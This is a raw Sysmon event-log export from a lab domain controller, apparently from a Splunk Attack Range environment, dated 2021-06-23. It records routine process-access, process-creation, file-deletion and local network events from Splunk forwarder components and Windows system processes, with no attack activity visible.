21:05:57.863{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021775Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:57.863{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021774Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:57.863{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021773Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:57.863{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021772Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:57.863{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A235-60D3-9E04-00000000CF01}6160C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021771Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:57.863{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A235-60D3-9E04-00000000CF01}6160C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000021770Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:57.864{4DB9351A-A235-60D3-9E04-00000000CF01}6160C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000021769Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:57.369{4DB9351A-A234-60D3-9D04-00000000CF01}41205700C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021780Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:58.144{4DB9351A-A235-60D3-9E04-00000000CF01}61607164C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000021779Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:58.004{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=532FCAF3F5182BBE79AE56A159255D9C,SHA256=AB1F71045F58845F50EA1DCADAAED08223A1BC6C219881920F68C0076A299119,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021790Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:59.695{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A237-60D3-9F04-00000000CF01}6472C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021789Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:59.695{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021788Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:59.695{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021787Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:59.695{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021786Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:59.695{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021785Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:59.695{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A237-60D3-9F04-00000000CF01}6472C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021784Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:59.695{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A237-60D3-9F04-00000000CF01}6472C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000021783Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:59.696{4DB9351A-A237-60D3-9F04-00000000CF01}6472C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000021782Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:58.261{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61446-false10.0.1.12-8000- 23542300x800000000000000021781Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:59.101{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3595601EF8FA8F38CAA17E04F190D184,SHA256=66338FEDBBB3B516041FA3699AC7D58D48451BBF5611F53A58BE7605DAA9F22B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021792Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:00.711{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A37537FB7019FACC4EA6C6FF401CF2A8,SHA256=1F62ABC92BEA782F0C5141925B2EFB143F8E0F183C953CE9928540858AB2D7E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021791Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:00.179{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD8FD3F4DC5BEA9B48818B9F6E77B22E,SHA256=409135399FB742114F06B137BBD8852915A78E3BC2F48FF5E68CB5E1EA433BE8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021793Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:01.211{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18C69150F09B0E7FF716E1E034ABAD48,SHA256=1CE875DFC3FB9B9E21D17329EAED56B4FD101D24382D3AC62C625DA5E4972A4B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021794Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:02.273{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1787ED23ACF43B036A7614536CE29E29,SHA256=5115D98242FBC6D165CCC23988DF7D1C4D947BCD72AC325048EC13C043C0C0A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021795Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:03.304{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2918F7D011218D9ED0B1D69AB7282130,SHA256=01E2BA83C956347D43E744E48FA74FDCEC293F6DD59A98FB6033D27D9548D700,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021796Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:04.336{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2256B3BD0741DE13A9339945A44190CC,SHA256=D992FE2821A2897B4D03EC00C68C221B845AFC23E38B7A909E477A01C8123F3C,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000021798Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:04.267{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61447-false10.0.1.12-8000- 23542300x800000000000000021797Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:05.351{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F61933B983B0586918415ADBC73C54DE,SHA256=EFC53FC6452710F5CC56D1EEC6B13D839AB6E7D41A66C5FF46BBCFC0B91CC87D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021799Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:06.351{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=653E47CF7D24783B3EB27D525FC9A03C,SHA256=4757F67110B05DD6282B652DDE2E90BCAB3A1E414772CD9D84A695B2DAD2AC92,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021800Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:07.461{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D70FE2B0D1DF5F4620C1B9C3A355DCDE,SHA256=AFA959A603478DC703A1EB08F93E3CC28021EDAEB8495F8228B2F52605B9755D,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000021802Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:08.617{4DB9351A-A230-60D3-9804-00000000CF01}3196C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\c7c-0\System.Management.Automation.dll2021-06-23 21:06:08.617 23542300x800000000000000021801Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:08.586{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E1DCA26F3ABFE9A016CE7D8F56D658D,SHA256=C19BBDFD48B79E5BA84A9CEA79C88535D253AB971DB8BC7425930F56F68145CC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021806Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:09.758{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A241-60D3-A004-00000000CF01}6968C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000021805Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:09.618{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F83C970AA2BFB03634CC67FA1F7F0A8,SHA256=39F895ABA50949049B577AC203560419604DB35A228406E83CFC5B1A05F2BF71,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021804Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:09.445{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A241-60D3-A004-00000000CF01}6968C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021803Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 